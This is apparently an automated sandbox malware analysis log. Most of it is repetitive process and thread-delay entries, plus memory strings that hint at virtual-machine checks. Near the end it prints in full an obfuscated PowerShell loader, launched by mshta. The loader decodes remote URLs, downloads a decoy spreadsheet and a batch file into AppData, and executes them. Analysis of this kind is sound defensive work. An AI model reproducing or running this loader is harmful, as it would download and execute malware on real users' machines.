Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4538Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3577Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5288Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 852Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 814Jump to behavior
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 612
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7464Thread sleep time: -11068046444225724s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7436Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7692Thread sleep count: 5288 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7696Thread sleep count: 852 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8104Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7884Thread sleep count: 814 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7880Thread sleep count: 270 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7940Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7956Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
Source: mshta.exe, 00000000.00000003.1787650198.0000000000AB5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000000B.00000002.2966146591.000002AB2DC2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2967560916.000002AB2F05C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: powershell.exe, 00000001.00000002.1781803953.0000000007B28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zyfTBcnYzprd($pHHdIofq, $hQvuJry){[IO.File]::WriteAllBytes($pHHdIofq, $hQvuJry)};function RsNIEjCO($pHHdIofq){if($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61328,61336,61336))) -eq $True){rundll32.exe $pHHdIofq }elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61340,61343,61277))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $pHHdIofq}elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61337,61343,61333))) -eq $True){misexec /qn /i $pHHdIofq}else{Start-Process $pHHdIofq}};function ZWufiDkKJd($WfmgmuntIKBYcRft){$ywqrhKjGiioXguh = New-Object (ySHQDZBWwySzRGIG @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hQvuJry = $ywqrhKjGiioXguh.DownloadData($WfmgmuntIKBYcRft);return $hQvuJry};function ySHQDZBWwySzRGIG($xGZDVkPMYLYy){$yFBtdzpE=61228;$oUSwLv=$Null;foreach($fxEGQMN in $xGZDVkPMYLYy){$oUSwLv+=[char]($fxEGQMN-$yFBtdzpE)};return $oUSwLv};function dDSCNJIjjRgIM(){$lBhpKXrqsdodra = $env:AppData + '\';$RtGcEcBBqYud = $lBhpKXrqsdodra + 'jiteon.xlsx';If(Test-Path -Path $RtGcEcBBqYud){Invoke-Item $RtGcEcBBqYud;}Else{ $hKUnbCqsPbBsWBpNkbF = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61334,61333,61344,61329,61339,61338,61274,61348,61336,61343,61348));zyfTBcnYzprd $RtGcEcBBqYud $hKUnbCqsPbBsWBpNkbF;Invoke-Item $RtGcEcBBqYud;};$gzgwwTbWpZOp = $lBhpKXrqsdodra + 'GoGi.bat'; if (Test-Path -Path $gzgwwTbWpZOp){RsNIEjCO $gzgwwTbWpZOp;}Else{ $VgJdQKaf = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61299,61339,61299,61333,61274,61326,61325,61344));zyfTBcnYzprd $gzgwwTbWpZOp $VgJdQKaf;RsNIEjCO $gzgwwTbWpZOp;};;;;}dDSCNJIjjRgIM;Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\AppData\Roaming\jiteon.xlsx"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\GoGi.bat" "Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\GoGi.bat" Jump to behavior
